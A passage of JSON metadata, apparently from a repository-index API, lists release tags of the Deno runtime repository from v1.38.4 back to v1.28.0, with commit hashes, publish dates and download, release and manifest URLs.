,{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2